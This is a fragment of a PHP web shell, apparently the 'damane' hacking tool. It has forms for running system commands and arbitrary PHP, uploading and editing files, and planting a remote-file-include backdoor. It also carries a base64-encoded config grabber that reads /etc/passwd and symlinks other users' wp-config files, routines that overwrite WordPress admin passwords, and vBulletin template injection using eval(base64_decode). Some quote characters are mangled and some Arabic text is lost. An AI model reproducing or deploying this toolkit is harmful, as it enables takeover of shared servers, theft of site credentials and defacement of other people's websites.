	<input type="submit" value="ReaD"></strong></td>
    	</tr>
<input type="hidden" name="page" value="read_mysql">    	
</form>    	


    <td valign="top" colspan="6">&nbsp;</td>

<form method="POST" target="_blank">
<strong>
    	</strong>
    	<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Create A File By MYSQL</strong></td>
    				</tr>
    	<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>User</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text" dir="ltr"></strong></td>
    <td valign="top" bgcolor="#151515"><strong>Pass</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text" dir="ltr"></strong></td>
    <td valign="top" bgcolor="#151515"><strong>Database Name</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text" dir="ltr"></strong></td>
    				</tr>
					<tr>
    <td valign="top" bgcolor="#151515" style="height: 25x; width: 139px;">
	<strong>CodE ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
	<strong>
	<textarea name="codes" style="width: 353px; height: 89px" dir="ltr" cols="20" rows="1">&lt;?php include($_GET['u'])?&gt;</textarea><br>
	??? ????? ???? ????<span lang="en-us"> file include </span>????? ??????? ?? 
	?? ???? ???????<br><span lang="en-us">www.site.com/file.php?u=http://shell</span></strong></td>
    			</tr>
					<tr>
    <td valign="top" bgcolor="#151515" style="height: 25x; width: 139px;">
	<strong>File Path ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
	<strong>
	<input name="pathclass" type="text" style="width: 284px"  dir="ltr" value="<?php echo realpath('')?>/file.php"></strong></td>
    	</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
	<input type="submit" value="Create"></strong></td>
    	</tr>
<input type="hidden" name="page" value="file_mysql">    	
</form>    	


		<tr>
    
    <td valign="top" colspan="6">&nbsp;</td>

		</tr>
		
<form method="POST" target="_blank">
		<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Command  
	system - passthru - exec - shell_exec</strong></td>
    				</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Commands ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
					<select name="att" dir="rtl"  size="1">
<?php
if($_POST['att']==null)
{
echo '						<option value="system" selected="">system</option>';
}else{
echo "						<option value='$_POST[att]' selected=''>$_POST[att]</option>
						<option value=system>system</option>
";

						
}
?>

						<option value="passthru">passthru</option>
						<option value="exec">exec</option>
						<option value="shell_exec">shell_exec</option>
					</select>    
    <strong>
<input name="page" type="hidden" value="ccmmdd">    
	<input name="ccmmdd2" type="text" style="width: 284px" value="ls -la" dir="ltr"></strong></td>
    	</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
	<input type="submit" value="Run"></strong></td>
    	</tr>
</form>    	    	

<form method="POST" target="_blank">

		<tr>
    
    <td valign="top" colspan="6">&nbsp;</td>

		</tr>

		<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Managing files and folders</strong></td>
    				</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Path ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
	<strong>
	<input name="pathclass" type="text" style="width: 284px" dir="ltr" value="<?php echo realpath('')?>"></strong></td>
    	</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
	<input type="submit" value="View"></strong></td>
    				</tr>
<input name="page" type="hidden" value="showdir">        				
</form>    	

<form method="POST" target="_blank">

		<tr>
    
    <td valign="top" colspan="6">&nbsp;</td>

		</tr>

		<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Download A File</strong></td>
    				</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Path Of File ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
	<strong>
	<input name="pathclass" type="text" style="width: 284px"  dir="ltr" value="<?php echo realpath('')?>"></strong></td>
    	</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
	<input type="submit" value="Download"></strong></td>
    				</tr>
<input name="page" type="hidden" value="download">        				
</form>   

<form method="POST" target="_blank">

		<tr>
    
    <td valign="top" colspan="6">&nbsp;</td>

		</tr>

		<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Edit A File</strong></td>
    				</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>path Of File ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
	<strong>
	<input name="pathclass" type="text" style="width: 284px" dir="ltr" value="<?php echo realpath('')?>"></strong></td>
    	</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
	<input type="submit" value="Edit" style="width: 36px"></strong></td>
    				</tr>
<input name="page" type="hidden" value="show">        				
</form>    	

<form method="POST" target="_blank" enctype="multipart/form-data">

		<tr>
    
    <td valign="top" colspan="6">&nbsp;</td>

		</tr>

		<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Upload A File</strong></td>
    				</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>File ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
	<input name="img" type="file"></td>
    	</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Path ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
	<strong>
	<input name="pathclass" type="text" style="width: 284px" dir="ltr" value="<?php echo realpath('')?>"></strong></td>
    	</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
	<input type="submit" value="Upload"></strong></td>
    				</tr>
<input name="page" type="hidden" value="upload">        				
</form>    				


<form method="POST" target="_blank">

		<tr>
    
    <td valign="top" colspan="6">&nbsp;</td>

		</tr>

		<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Excute PHP</strong></td>
    				</tr>
		<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Code ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
	<strong>
	<textarea name="code" dir="ltr" style="width: 353px; height: 89px">echo '<center><b>PHP Working</b></center>';
#readfile('/etc/passwd');
</textarea>
</strong>
</td>
</tr>
<tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
<input type="submit" value="RUN" style="height: 26px"></strong></td>
</tr>
<input name="page" type="hidden" value="code">
</form>    	

    <p align="center"></td>
  </tr><div align="center">

                <tr>
</table>
</td>
</tr>
</table>‘;
$file = fopen("cpn.php" ,"w+");
$write = fwrite ($file ,base64_decode($crackftp));
fclose($file);
echo "<iframe src=damane/cpn.php width=100% height=100% frameborder=0></iframe> ";
}
elseif ($action == ’s4config‘) {
@chdir(‚damane‘);
$local_exp = ‚PGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5TZWM0RXZlciBDb25maWcgR3JhYmJlciBCeSBEYW1hbmUyMDExPC90aXRsZT4NCjxsaW5rIGhyZWY9J2h0dHA6Ly93d3cuc2VjNGV2ZXIuY29tL2hvbWUvc2VjNGV2ZXIuZ2lmJyB0eXBlPSdpbWFnZS94LWljb24nIHJlbD0nc2hvcnRjdXQgaWNvbicgLz4NCjxzdHlsZT4NCmJvZHl7YmFja2dyb3VuZC1jb2xvcjojMTExO2NvbG9yOiMwMGZmMDA7fQ0KYm9keSx0ZCx0aHsgZm9udDogOHB0IEx1Y2lkYSxUYWhvbWE7bWFyZ2luOjA7dmVydGljYWwtYWxpZ246dG9wO2NvbG9yOiMwMGZmMDA7IH0NCnRhYmxlLmluZm97IGNvbG9yOiMwMDA7YmFja2dyb3VuZC1jb2xvcjojMjIyOyB9DQp0ZXh0LWFsaWduOiBjZW50ZXI7DQpzcGFuLGgxLGF7IGNvbG9yOiAkY29sb3IgIWltcG9ydGFudDsgfQ0Kc3BhbnsgZm9udC13ZWlnaHQ6IGJvbGRlcjsgfQ0KaDF7IGJvcmRlci1sZWZ0OjdweCBzb2xpZCAkY29sb3I7cGFkZGluZzogM3B4IDVweDtmb250OiAxNHB0IFZlcmRhbmE7YmFja2dyb3VuZC1jb2xvcjojMzMzO21hcmdpbjowcHg7IH0NCmRpdi5jb250ZW50eyBwYWRkaW5nOiA1cHg7bWFyZ2luLWxlZnQ6NXB4O2JhY2tncm91bmQtY29sb3I6IzIyMjsgfQ0KYXsgdGV4dC1kZWNvcmF0aW9uOm5vbmU7IH0NCmE6aG92ZXJ7IHRleHQtZGVjb3JhdGlvbjp1bmRlcmxpbmU7IH0NCi5tbDF7IGJvcmRlcjoxcHggc29saWQgIzU1NTtwYWRkaW5nOjVweDttYXJnaW46MDtvdmVyZmxvdzogYXV0bzsgfQ0KLmJpZ2FyZWF7IHdpZHRoOjEwMCU7aGVpZ2h0OjMwMHB4OyB9DQojbmV3LGlucHV0LHRhYmxlLHRkLHRyLCNnZ3tib3JkZXItc3R5bGU6c29saWQ7dGV4dC1kZWNvcmF0aW9uOmJvbGQ7fQ0KaW5wdXQsdGV4dGFyZWEsc2VsZWN0eyBtYXJnaW46MDtjb2xvcjojOTk5O2JhY2tncm91bmQtY29sb3I6IzIyMjtib3JkZXI6MXB4IHNvbGlkICRjb2xvcjsgZm9udDogOHB0IFRhaG9tYSwiVGFob21hIjsgfQ0KLnN0eWxlew0KICAgIGZvbnQtc2l6ZTogMzZweDsNCgl0ZXh0LWFsaWduOiBjZW50ZXI7DQogICAgY29sb3I6ICNGRkZGRkY7DQogICAgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsNCiAgICBmb250LWZhbWlseTogR2VvcmdpYSwgIlRpbWVzIE5ldyBSb21hbiIsIFRpbWVzLCBzZXJpZjsNCn0NCiN0ZXh0YXJlYSB7DQogYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsNCiAtbW96LWJvcmRlci1yYWRpdXM6IDE1cHg7DQogLXdlYmtpdC1ib3JkZXItcmFkaXVzOiAxNXB4Ow0KIGJvcmRlcjogMXB4IHNvbGlkICNGRjAwMDA7DQogcGFkZGluZzogNXB4OyBjb2xvcjojRkYwMDAwDQp9DQo8L3N0eWxlPg0KPGRpdiBhbGlnbj0iY2VudGVyIiBjbGFzcz0ic3R5bGUiPlNlYzRFdmVyIENvbmZpZyBHcmFiYmVyIEJ5IERhbWFuZTIwMTEgKFBIUCBWZXJzaW9uKTwvZGl2Pg0KPHA+Jm5ic3A7PC9wPg0KPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCI+DQo8cCBhbGlnbj0iY2VudGVyIj4NCjxmb250IHNpemU9IjUiPkNvbmZpZ3MgUGF0aDo8L2ZvbnQ+DQo8cD4mbmJzcDs8L3A+DQo8cCBhbGlnbj0iY2VudGVyIj48dGV4dGFyZWEgaWQ9InRleHRhcmVhIiBuYW1lPSJjb25maWdzIiBjb2xzPSIxMDAiIHJvd3M9IjE4IiA+L2Jsb2cvd3AtY29uZmlnLnBocDwvdGV4dGFyZWE+DQo8cD4mbmJzcDs8L3A+DQo8cCBhbGlnbj0iY2VudGVyIj48Zm9udCBzaXplPSI1Ij5Ib21lIFBhdGg6PC9mb250Pg0KPHA+Jm5ic3A7PC9wPg0KPHAgYWxpZ249ImNlbnRlciI+PGlucHV0IG5hbWU9ImhvbWUiIHR5cGU9InRleHQiIHNpemU9IjMwIiB2YWx1ZT0iL2hvbWUiLz48YnI+DQo8cD4mbmJzcDs8L3A+DQo8cCBhbGlnbj0iY2VudGVyIj48Zm9udCBzaXplPSI1Ij5GaWxlcyBQYXRoOjwvZm9udD4NCjxwPiZuYnNwOzwvcD4NCjxwIGFsaWduPSJjZW50ZXIiPjxpbnB1dCBuYW1lPSJwdWJsaWMiIHR5cGU9InRleHQiIHNpemU9IjMwIiB2YWx1ZT0iL3B1YmxpY19odG1sIi8+PGJyPg0KPHA+Jm5ic3A7PC9wPg0KPHAgYWxpZ249ImNlbnRlciI+PGlucHV0IG5hbWU9InN5bWxpbmsiIHNpemU9IjgwIiB2YWx1ZT0iU3ltbGluayIgdHlwZT0ic3VibWl0Ij4NCjxwPiZuYnNwOzwvcD4NCjwvZm9ybT4NCjw/DQovKg0KDQpGaWxlIFdyaXRlZCBCeSBEYW1hbmUyMDExDQoNCkVtYWlsOiBEYW1hbmUtRHpAaG90bWFpbC5jb20NCg0KVHdpdHRlcjogQERhbWFuZUR6DQoNCkJlZm9yZSBVc2luZyBUaGlzIEZpbGUgUGxlYXNlIENoZWNrIFRoZSBEaXNhYmxlZCBGdW5jdGlvbiANCg0KWW91IENhbiBVc2UgVGhpcyBGaWxlIFRvIENoZWNrIFRoZW0NCg0KaHR0cDovL3Bhc3RlYmluLmNvbS9Cc1RuQmpRag0KDQpQLlM6IFN5bWxpbmsgRnVuY3Rpb24gSXMgVmVyeSBSZXF1ZXN0ZWQNCg0KVGhlIEJlbG93IENvbW1lbnRzIFdhcyBDcmVhdGVkIEp1c3QgdG8gSGVscCBCZWdpbm5lcg0KDQoqLw0KDQpzZXRfdGltZV9saW1pdCgwKTsgLy8gbm8gdGltZSBsaW1pdA0KDQppZihpc3NldCgkX1BPU1RbInN5bWxpbmsiXSkpew0KDQokY29uZmlncyA9IGV4cGxvZGUoIlxuIiwkX1BPU1RbImNvbmZpZ3MiXSk7DQoNCiRwdWJsaWMgPSAkX1BPU1RbJ3B1YmxpYyddOw0KDQokaG9tZSA9ICRfUE9TVFsnaG9tZSddOw0KDQokcGFzc3dkID0gZm9wZW4oIi9ldGMvcGFzc3dkIiwgInJiIik7IC8vIFJlYWQgUGFzc3dkIEZpbGUNCg0Kd2hpbGUgKCFmZW9mKCRwYXNzd2QpICkgew0KJGxpbmVzID0gZmdldHMoJHBhc3N3ZCk7IC8vID4+IEdldCBDb250ZW50cyBPZiBUaGUgUGFzc3dkIEZpbGUNCiR1c2VyID0gZXhwbG9kZSgnOicsICRsaW5lcyk7IC8vIEV4cGxvZGUgVGhlIFBhc3N3ZCBGaWxlIEJ5IDoNCg0KZmlsZV9wdXRfY29udGVudHMoInVzZXJzLnR4dCIgLCAkdXNlclswXS4iXG4iLCBGSUxFX0FQUEVORCk7IC8vIFdyaXRlIEEgTmV3IEZpbGUgQ29udGFpbiBVc2Vycw0KDQovLyBTdGFyVCBTeW1saW5raW5nIC4uLg0KDQpmb3JlYWNoICgkY29uZmlncyBhcyAkY29uZmlnKXsNCg0KLy8gc3lzdGVtKCJsbiAtcyAkaG9tZS8kdXNlclswXSRwdWJsaWMvJGNvbmZpZyAkdXNlclswXS0kY29uZmlnLnR4dFxuIik7DQoNCnN5bWxpbmsoJGhvbWUuJy8nLiR1c2VyWzBdLiRwdWJsaWMuJy8nLiRjb25maWcsICR1c2VyWzBdLidfJy4kY29uZmlnLicudHh0Jyk7DQoNCg0KLy8gJHN5bSA9ICR1c2VyWzBdLSRjb25maWcuJy50eHQnOw0KDQppZihmaWxlX2V4aXN0cygkc3ltKSl7DQogICAgZWNobyAiU3ltbGluayBPZiBUaGUgQ29uZmlnIEZvciBUaGUgVXNlciAkdXNlclswXSBJcyBIZXJlOiAkc3ltIjsNCn0NCi8vIERvbmUgU3ltaWxua2luZyA6cA0KfQ0KLy8gRU9GIQ0KfQ0KLy8gR2VuZXJhdGUgLmh0YWNjZXNzIERlbGV0ZSAvLyBUbyBBY3RpdmF0ZSBUaGUgQWN0aW9uIDpwDQovLyBmaWxlX3B1dF9jb250ZW50cygiLmh0YWNjZXNzIiAsICJBZGRIYW5kbGVyIHBocC1zY3JpcHQgLnR4dFxuQWRkVHlwZSB0ZXh0L2h0bWwgaHRtIGh0bWwgcGhwXG4iLCBGSUxFX0FQUEVORCk7DQoNCi8vIE9oIEZpbmFsbFkgOnAgISENCnByaW50ICI8cCBhbGlnbj0nY2VudGVyJz48Zm9udCBjb2xvcj0nI0Y2MzU4QScgc2l6ZT0nNCc+RG9uRSAhPC9wPiI7DQp9DQo/Pg0KPHA+ICZuYnNwOzwvcD4NCjxwPiAmbmJzcDs8L3A+DQo8cCBhbGlnbj0iY2VudGVyIj48Zm9udCBjb2xvcj0iI0Y2MzU4QSIgc2l6ZT0iNCI+QnkgRGFtYW5lMjAxMShEYW1hbmUtRHpAaG90bWFpbC5jb20pPC9mb250Pjxicj48YnI+DQpNYURlIGluIEFsR2VyaWEgMjAxMiAmY29weTwvcD4NCjwvaGVhZD4NCjwvaHRtbD5=‘;
$file = fopen("config_grabber.php" ,"w+");
$write = fwrite ($file ,base64_decode($local_exp));
fclose($file);
echo "<iframe src=damane/config_grabber.php width=100% height=100% frameborder=0></iframe>";
}
elseif ($action == ‚domain‘) {
$d0mains = @file("/etc/named.conf");
if(!$d0mains){ die("<b># can’t ReaD -> [ /etc/named.conf ]"); }
echo "<table align=center border=1>
<tr bgcolor=green><td>d0mains</td><td>users</td></tr>";
foreach($d0mains as $d0main){
if(eregi("zone",$d0main)){
preg_match_all(‚#zone "(.*)"#‘, $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user[’name‘]."</td></tr>"; flush();
}}}
;
}
elseif ($action == ‚wpchange‘) {
if(empty($_POST[‚pwd‘])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"wp-\" name=\"database\" type=\"text\"><br>
username : <INPUT size=\"15\" value=\"wp-\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"**\" name=\"password\" type=\"password\"><br>
<br>
Set A New username 4 Login : <INPUT name=\"admin\" size=\"15\" value=\"admin\"><br>
Set A New password 4 Login : <INPUT name=\"pwd\" size=\"15\" value=\"damane\"><br>
<INPUT value=\"change\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST[‚localhost‘];
$database = $_POST[‚database‘];
$username = $_POST[‚username‘];
$password = $_POST[‚password‘];
$pwd = $_POST[‚pwd‘];
$admin = $_POST[‚admin‘];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$hash = crypt($pwd);
$a4s=@mysql_query("UPDATE wp_users SET user_login =’".$admin."‘ WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass =’".$hash."‘ WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login =’".$admin."‘ WHERE ID = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass =’".$hash."‘ WHERE ID = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login =’".$admin."‘ WHERE ID = 3") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass =’".$hash."‘ WHERE ID = 3") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_email =’".$SQL."‘ WHERE ID = 1") or die(mysql_error());
if($a4s){
echo "<b> Success :now use a new user and pass 2 login in the admin panel</b> ";
}
}
}
elseif ($action == "symlinker") {
@error_reporting(E_ALL ^ E_NOTICE);
@ini_set(‚error_log‘,NULL);
@ini_set(‚log_errors‘,0);
@ini_set(‚max_execution_time‘,0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo "<center>";
echo "<br><pre><h1>Server Symlinker</h1></pre>";
@mkdir(’sym‘,0777);
$htaccess_contents = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$htaccess_file =@fopen (’sym/.htaccess‘,’w‘);
fwrite($htaccess_file ,$htaccess_contents);
@symlink(‚/‘,’sym/root‘);
$basename = basename(‚_FILE_‘);
$named_conf = @file(‚/etc/named.conf‘);
if(!$named_conf)
{
echo "<pre><h1>Sorry..Can’t access ‚/etc/named.conf‘ file on server </h1></pre></center>";
}
else
{
echo "<table align=’center‘ width=’60%‘ class=’table‘><td>Domains</td><td>Users</td><td>Symlink</td>";
foreach($named_conf as $named_conf1){
if(@eregi(‚zone‘,$named_conf1)){
preg_match_all(‚#zone "(.*)"#‘,$named_conf1,$url);
flush();
if(strlen(trim($url[1][0])) >2){
$user = @posix_getpwuid(@fileowner(‚/etc/valiases/‘.$url[1][0]));
$sym = $user[’name‘] ;
@symlink(‚/‘,’sym/root‘);
$sym = $url[1][0];
echo "
<tr>
<td>
<a target=’_blank‘ href=http://www.".$url[1][0].’/>‘.$sym.‘ </a>
</td>
<td>
‚.$user[’name‘]."
</td>
<td>
<a href=’sym/root/home/".$user[’name‘]."/public_html‘ target=’_blank‘>symlink </a>
</td>
</tr>";
flush();
}
}
}
}
}
elseif($action == "passwd") {
show_source(‚/etc/passwd‘);
}
elseif ($action == ’sql_cmd‘) {
@chdir(‚damane‘);
$symlinker = ‚<head>
<title>SQL CMD 3.0 | al-swisre</title>
<meta http-equiv="content=type"  content="text/html; charset=utf-8" />
<style type="text/css">

  html,body {
     margin: 0;
     padding: 0;
     outline: 0;
}


body {
    direction: rtl;
 background-color: #000000;
	color: #cccccc;
     }

input,textarea,select{
font-weight: bold;
color: #cccccc;
dashed #ffffff;
border: 1px
solid #2C2C2C;
background-color: #080808
}


.all
{
  margin-left: auto;
  margin-right: auto;
  width: 60%;
  box-shadow: 0px 0px 4px #888888;
  direction: ltr;

}
.hdr{
  font-family:Tahoma, Arial, sans-serif;
  font-size: 27px;
  color:#BBBBBB;
  font-weight: bold;
  text-align: center;
}
.com{

  font-size: 18px;
  font-family:Tahoma, Arial, sans-serif;
  color: #BBBBBB;
  text-shadow: #FF0000;
}

.foter{
  font-size: 9pt;
  color:  #444444 ;
  text-align: center
}
#drp{
  width:150px;
  position: absolute;

  float: none;

}


#rok{
  text-decoration: none;
  padding : 4px;
  list-style: none;
  float: left;
}
#rok a{
  text-decoration: none;
  color: #cccccc;
  font-size: 10pt;
  margin-left: 2px;
  list-style: none;
  padding : 4px;

}
.nvbr{
  border-top: 1px #222222 dashed;
  height: 33px;
  background: #000000;
  border-bottom: 1px #222222 dashed;
  font-family: Tahoma, Arial, sans-serif ;
  font-weight: bold;
}

.nvbr ul{
 list-style: none;
 margin: 0;
 padding: 0;

}

.nvbr ul li{
  float: left;

}

.nvbr ul li a{
 display: block;
 text-decoration: none;
 padding: 10px 9px 10px 9px;
  color: #999999   ;
  font-size: 12px;
}

.nvbr ul li a:hover{
 color: #FFFFFF;
 box-shadow: 0px 0px 3px #cccccc ;
 text-shadow: 0px 0px 3px #FFFFFF;
}

#drp{
 list-style: none;
 direction: ltr;
  width:150px;
  position: absolute;
  display: none;
  border-bottom:solid 1px #222222;
  border-left: solid 1px #222222;
  border-right: solid 1px #222222;
}

#drp{
  float: none;
}

#rok:hover #drp{
 display: block;
 background: #000000;
 }
 .tbm{
 font-size: 14px;
}

.tbm tr td{
 border: dashed 1px #111111;

}





</style>
</head>

<body>
<br />
<div class="all" >

<br /><div class="hdr">SQL CMD 3.0</div><br />
<?php
$peag = basename(__FILE__);

echo'
<div class="nvbr">
 <ul>
 <li><a href="'.$peag.'">SQL CMD</a>

 </li>
 </ul>

 <ul>
 <li id="rok"><a href="">vBulletin</a>

 <div id="drp">
 <ul><a href="?sws=1" >Inject index</a> </ul>
 <ul><a href="?sws=4" >Inject faq</a> </ul>
 <ul><a href="?sws=5" >Inject calendar</a> </ul>
 <ul><a href="?sws=6" >Inject search</a> </ul>
 <ul><a href="?sws=7" >show members</a> </ul>
 </div>

 </li>
 </ul>

  </ul>

 <ul>
 <li id="rok"><a href="">WordPress</a>

 <div id="drp">
 <ul><a href="?sws=2" >Change admin</a> </ul>
 <ul><a href="?sws=8" >show members</a> </ul>
 </div>

 </li>
 </ul>

  <ul>
 <li id="rok"><a href="">Joomla</a>

 <div id="drp">
 <ul><a href="?sws=3" >Change admin</a> </ul>
 <ul><a href="?sws=9" >show members</a> </ul>
 </div>

 </li>
 </ul>

</div>';
?>

<?php


$shell = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;

if(isset($_REQUEST['sws']))
{

switch ($_REQUEST['sws'])
{

case 1:

echo '

<div class="com">
<form method="post">
<table cellpadding="4" align="center" width="35%" class="tab">
 <br />

<tr">
     <td>Host :</td>
     <td><input type="text" name="host" value="localhost" /></td>
</tr>

<tr ">
     <td>user&nbsp;:</td>
     <td><input type="text" name="user" /></td>
</tr>

<tr>
     <td>Pass :</td><td><input type="text" name="pass"/></td>

</tr>

<tr>
     <td>db&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="db" /></td>
</tr>
</table>
<table class="tab2" cellpadding="4" align="center" width="45%">
<tr>
     <td >Your index :</td>
     <td><textarea rows="3" name="index"></textarea></td>
</tr>


<tr>

      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>

</tr>
  </table>
 </form>  </div>';
// <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< vb >>>>>>>>>>>>>>>>>>>>>>>>
 $host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db   = $_POST['db'];
$index  = $_POST['index'];

if(isset($host) ) {
$con =@ mysql_connect($host,$user,$pass) or die ;
$sedb =@ mysql_select_db($db) or die;
$index=str_replace("\'","'",$index);
$crypt  = "{\${eval(base64_decode(\'";
$crypt .= base64_encode("echo \"$index\";");
$crypt .= "\'))}}{\${exit()}}</textarea>";
$sqlindex = "UPDATE `template` SET `template` = '$crypt'" or die;
$query =@ mysql_query($sqlindex,$con);

if ($query)
{
  echo "<center><br /><div class='com'>~_^ ?? ?????????<br /><br /></div></center>";
}
else if (!$query)
{
  echo "error";
}

}else
{
  echo "<center><br /><div class='com'>! ???? ?????? ??????? <br /><br /></div></center>";
}
  break;


// <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< wp >>>>>>>>>>>>>>>>>>>>>>>>

  case 2:

  echo '

<div class="com">
<form method="post">
<table cellpadding="4" align="center" width="35%" class="tab">
 <br />

<tr">
     <td>Host :</td>
     <td><input type="text" name="host" value="localhost" /></td>
</tr>

<tr ">
     <td>user&nbsp;:</td>
     <td><input type="text" name="user" /></td>
</tr>

<tr>
     <td>Pass :</td><td><input type="text" name="pass"/></td>

</tr>

<tr>
     <td>db&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="db" /></td>
</tr>
</table>
<table cellpadding="4" align="center" width="45%" class="tab">

<tr>
     <td>user admin&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="useradmin" /></td>
</tr>
<tr>
     <td>pass admin&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="passadmin" /></td>
</tr>

<tr>

      <td colspan="6" align="center" width="70%"> <input type="submit" value="SQL" maxlength="30" />  <input type="reset" value="clear" maxlength="30" /> </td>

</tr>
  </table>
 </form> </div>';

$host       = $_POST['host'];
$user       = $_POST['user'];
$pass       = $_POST['pass'];
$db         = $_POST['db'];
$useradmin  = $_POST['useradmin'];
$pass_ad    = $_POST['passadmin'];



if(isset($host) ) {
$con =@ mysql_connect($host,$user,$pass) or die ;
$sedb =@ mysql_select_db($db) or die;

$crypt = crypt($pass_ad);


$query =@mysql_query("UPDATE `wp_users` SET `user_login` ='".$useradmin."' WHERE ID = 1") or die;
$query =@mysql_query("UPDATE `wp_users` SET `user_pass` ='".$crypt."' WHERE ID = 1") or die;



if ($query)
{
  echo "<center><br /><div class='com'>~_^ ?? ?????????<br /><br /></div></center>";
}
else if (!$query)
{
  echo "error";
}

}else
{
  echo "<center><br /><div class='com'>! ???? ?????? ??????? <br /><br /></div></center>";
}



  break;



// <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< joomla >>>>>>>>>>>>>>>>>>>>>>>>

  case 3:
  echo '

<div class="com">
<form method="post">
<table cellpadding="4" align="center" width="35%" class="tab">
 <br />

<tr">
     <td>Host :</td>
     <td><input type="text" name="host" value="localhost" /></td>
</tr>

<tr ">
     <td>user&nbsp;:</td>
     <td><input type="text" name="user" /></td>
</tr>

<tr>
     <td>Pass :</td><td><input type="text" name="pass"/></td>

</tr>

<tr>
     <td>db&nbsp;&nbsp;&nbsp;:</td>
     <td><input type="text" name="db" /></td>
</tr>
</table>
<table cellpadding="4" align="center" width="50%" class="tab">

<tr>
